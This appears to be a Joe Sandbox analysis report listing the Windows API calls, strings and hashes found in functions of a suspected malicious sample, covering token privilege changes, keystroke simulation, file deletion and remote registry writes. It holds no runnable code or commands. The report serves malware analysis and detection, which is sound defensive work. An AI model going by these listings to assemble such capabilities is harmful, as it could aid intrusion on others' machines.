                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00CD48DF
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D0D665
                                                            • IsIconic.USER32(?), ref: 00D0D66E
                                                            • ShowWindow.USER32(?,00000009), ref: 00D0D67B
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D685
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D0D69B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D0D6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D0D6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D0D6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D0D6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00D0D6CF
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D0D719
                                                            • keybd_event.USER32(00000012,00000000), ref: 00D0D71E
                                                            • SetForegroundWindow.USER32(?), ref: 00D0D721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00D0D748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: f30822b55cc098ddd7ebe9fba6835f73303491562e217ce12df6105ed4ee6fe9
                                                            • Instruction ID: 39f40a8f7e62c3bc63427a6f0f5fa93c3c4677c6932e2444157209b3423a7a03
                                                            • Opcode Fuzzy Hash: f30822b55cc098ddd7ebe9fba6835f73303491562e217ce12df6105ed4ee6fe9
                                                            • Instruction Fuzzy Hash: CC317271A40318BBEB206BA19C49F7F7E6DEB44B51F104026FE05EB2D1D6B05901ABB1
                                                            Function 00D28310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D2882B
                                                              • Part of subcall function 00D287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D28858
                                                              • Part of subcall function 00D287E1: GetLastError.KERNEL32 ref: 00D28865
                                                            • _memset.LIBCMT ref: 00D28353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00D283A5
                                                            • CloseHandle.KERNEL32(?), ref: 00D283B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D283CD
                                                            • GetProcessWindowStation.USER32 ref: 00D283E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00D283F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D2840A
                                                              • Part of subcall function 00D281CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D28309), ref: 00D281E0
                                                              • Part of subcall function 00D281CB: CloseHandle.KERNEL32(?,?,00D28309), ref: 00D281F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: fed692db5a2b3f90e093abdd924df76191022ed11f185a0453f00aabdd94fe74
                                                            • Instruction ID: 750bfa27c6daba9b1a790d8a9bed7839714566e3e2b2badacf7cf76175b8faab
                                                            • Opcode Fuzzy Hash: fed692db5a2b3f90e093abdd924df76191022ed11f185a0453f00aabdd94fe74
                                                            • Instruction Fuzzy Hash: 03815B71902219AFDF119FA4EC45AEEBB79EF18308F184169F910A6261DB318E15EB70
                                                            Function 00D3C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D3C78D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3C7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D3C81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D3C844
                                                            • __swprintf.LIBCMT ref: 00D3C890
                                                            • __swprintf.LIBCMT ref: 00D3C8D3
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • __swprintf.LIBCMT ref: 00D3C927
                                                              • Part of subcall function 00CF3698: __woutput_l.LIBCMT ref: 00CF36F1
                                                            • __swprintf.LIBCMT ref: 00D3C975
                                                              • Part of subcall function 00CF3698: __flsbuf.LIBCMT ref: 00CF3713
                                                              • Part of subcall function 00CF3698: __flsbuf.LIBCMT ref: 00CF372B
                                                            • __swprintf.LIBCMT ref: 00D3C9C4
                                                            • __swprintf.LIBCMT ref: 00D3CA13
                                                            • __swprintf.LIBCMT ref: 00D3CA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 8c94ae45fa2fd60c29f8ad04da811b8ef0ba9d6f12f416383004ec249558144f
                                                            • Instruction ID: 610685163e87fe9108c0c21b3ca855e246adec10e7e5f422f7925d74de90c0a8
                                                            • Opcode Fuzzy Hash: 8c94ae45fa2fd60c29f8ad04da811b8ef0ba9d6f12f416383004ec249558144f
                                                            • Instruction Fuzzy Hash: CFA11EB6408344ABC750EFA4C885DAFB7ECFF94704F40091AF695D6291EB31DA08DB62
                                                            Function 00D3EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00D3EFB6
                                                            • _wcscmp.LIBCMT ref: 00D3EFCB
                                                            • _wcscmp.LIBCMT ref: 00D3EFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00D3EFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00D3F00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00D3F026
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00D3F04D
                                                            • _wcscmp.LIBCMT ref: 00D3F074
                                                            • _wcscmp.LIBCMT ref: 00D3F08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3F09D
                                                            • SetCurrentDirectoryW.KERNEL32(00D88920), ref: 00D3F0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3F0C5
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F0D2
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: faa4a237f6f4a73378d41686b5d4b1ec6432489215fa9447f2c85ea61cd96133
                                                            • Instruction ID: 9b98a8797ff6b1b72ce439f1c4fb75f0e3ce6a0ffbc1932c79a127f51278e95c
                                                            • Opcode Fuzzy Hash: faa4a237f6f4a73378d41686b5d4b1ec6432489215fa9447f2c85ea61cd96133
                                                            • Instruction Fuzzy Hash: 5D31D07290130C7EDB18ABA8DC48BEEB7AC9F48361F180176F914E31A1DB70DA44DA75
                                                            Function 00D50857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D50953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D5F910,00000000,?,00000000,?,?), ref: 00D509C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00D50A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D50A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 00D50DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D50DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 1f8fbd801c2829608c02520f48ba5e5ab7fd0a44bb2fad14dc6ef0f5962b4e58
                                                            • Instruction ID: 27fc9ae559132999e85460dab2dcb5b59c18ec27107e88605c4860b3aff3ce02
                                                            • Opcode Fuzzy Hash: 1f8fbd801c2829608c02520f48ba5e5ab7fd0a44bb2fad14dc6ef0f5962b4e58
                                                            • Instruction Fuzzy Hash: EC0238756006019FCB54EF18C851E2ABBE5FF89710F08885DF99A9B3A2DB30ED05DB91
                                                            Function 00D3F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00D3F113
                                                            • _wcscmp.LIBCMT ref: 00D3F128
                                                            • _wcscmp.LIBCMT ref: 00D3F13F
                                                              • Part of subcall function 00D34385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D343A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00D3F16E
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00D3F195
                                                            • _wcscmp.LIBCMT ref: 00D3F1BC
                                                            • _wcscmp.LIBCMT ref: 00D3F1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D3F1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00D88920), ref: 00D3F203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3F20D
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F21A
                                                            • FindClose.KERNEL32(00000000), ref: 00D3F22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: a7acdfe2ad501c3ed7e9cdcdcb747215db0a79d574b074ffcb712da220a926a0
                                                            • Instruction ID: 161f9e83d48a2bccf777299679e5392294da47d391426982d80ead99f8a2c4c1
                                                            • Opcode Fuzzy Hash: a7acdfe2ad501c3ed7e9cdcdcb747215db0a79d574b074ffcb712da220a926a0
                                                            • Instruction Fuzzy Hash: 1C31C27A90031DBEDB20ABA4EC59AEF77AC9F45361F140171E910E61A0DB30DA49DA78
                                                            Function 00D3A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D3A20F
                                                            • __swprintf.LIBCMT ref: 00D3A231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D3A26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D3A293
                                                            • _memset.LIBCMT ref: 00D3A2B2
                                                            • _wcsncpy.LIBCMT ref: 00D3A2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00D3A323
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D3A32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00D3A337
                                                            • CloseHandle.KERNEL32(00000000), ref: 00D3A341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 322a472c24f7590266ca871a9dba0279fee7ba0bc205b2788cac348462230931
                                                            • Instruction ID: f7570d724da59577e6d1124e2fadf7f0ba72bdb05b91ee1c9e84e6460a6d95a6
                                                            • Opcode Fuzzy Hash: 322a472c24f7590266ca871a9dba0279fee7ba0bc205b2788cac348462230931
                                                            • Instruction Fuzzy Hash: CD31B6B5600209ABDB21DFA4DC49FEB37BCEF89741F1441B5FA09D6160E77096448B35
                                                            Function 00CE66E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                            • API String ID: 0-4052911093
                                                            • Opcode ID: 714730177c228c46ea7f775f821316655d6032d785f51a5cb7bdd32ed35a8792
                                                            • Instruction ID: f1d9fd2fd334ef54f6b9773708fafe9eb2bb25a0db8ea99875ae3e54cab2f9e8
                                                            • Opcode Fuzzy Hash: 714730177c228c46ea7f775f821316655d6032d785f51a5cb7bdd32ed35a8792
                                                            • Instruction Fuzzy Hash: 43729375E00269DBDF14CF59D8407AEB7B5FF68314F14816AE859EB280E7309E81DBA0
                                                            Function 00D3001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00D30097
                                                            • SetKeyboardState.USER32(?), ref: 00D30102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00D30122
                                                            • GetKeyState.USER32(000000A0), ref: 00D30139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00D30168
                                                            • GetKeyState.USER32(000000A1), ref: 00D30179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00D301A5
                                                            • GetKeyState.USER32(00000011), ref: 00D301B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00D301DC
                                                            • GetKeyState.USER32(00000012), ref: 00D301EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00D30213
                                                            • GetKeyState.USER32(0000005B), ref: 00D30221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 2da7a13cc046a20e8a0c811b6d1647b63e802fea5d105caff2ad4df297e3ec1b
                                                            • Instruction ID: 0ed0686b4c46211134f1a3d84da89e32f68ab77a78b1a5a6cf2ab752b3b5726f
                                                            • Opcode Fuzzy Hash: 2da7a13cc046a20e8a0c811b6d1647b63e802fea5d105caff2ad4df297e3ec1b
                                                            • Instruction Fuzzy Hash: 6E51D72490478829FB39DBA488657EABFB49F01380F0C459ED9C25B5C2DAA49B8CC775
                                                            Function 00D503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D504AC
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D5054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D505E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00D50822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D5082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 112d2f9e87d097a5f742d83d888b5b7d45794b23ba8d55391f2c500218c13cb6
                                                            • Instruction ID: a4c8fe65b161876720577473851e45fed5ce51dcb3af7a91a44ceae57edc4d2c
                                                            • Opcode Fuzzy Hash: 112d2f9e87d097a5f742d83d888b5b7d45794b23ba8d55391f2c500218c13cb6
                                                            • Instruction Fuzzy Hash: CBE15E31604314AFCB14DF28C891E2ABBE4EF89715F08856DF94ADB3A1D730E905DBA1
                                                            Function 00D44164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: ef41aff5941e903a191395e52c1065dd1497d29eb6c6de19198a0ce95668cc11
                                                            • Instruction ID: febda6c9ca5b31bcf2b9032e1db6c9bdb485f136af3465f704f3b2af529c63f3
                                                            • Opcode Fuzzy Hash: ef41aff5941e903a191395e52c1065dd1497d29eb6c6de19198a0ce95668cc11
                                                            • Instruction Fuzzy Hash: 42218D752003109FDB10AF24EC49B6E7BA8EF05711F14802AFA46DB3A1DB70A840DB68
                                                            Function 00D337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CD4743,?,?,00CD37AE,?), ref: 00CD4770
                                                              • Part of subcall function 00D34A31: GetFileAttributesW.KERNEL32(?,00D3370B), ref: 00D34A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00D338A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00D3394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 00D3395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00D3397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D3399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00D339B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 5a5bb2bc82cd5ffb0c0b8d04911c277df562630097fbe4944baa336a8625d8a1
                                                            • Instruction ID: ec9ff1a23b7c9478fe2430563ed4868d829112af75157747488cee59128d60d9
                                                            • Opcode Fuzzy Hash: 5a5bb2bc82cd5ffb0c0b8d04911c277df562630097fbe4944baa336a8625d8a1
                                                            • Instruction Fuzzy Hash: 85518E3180514CEACF05EBA4DA929EDB779AF14301F6401AAF906B7291EF716F09DB70
                                                            Function 00D3F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
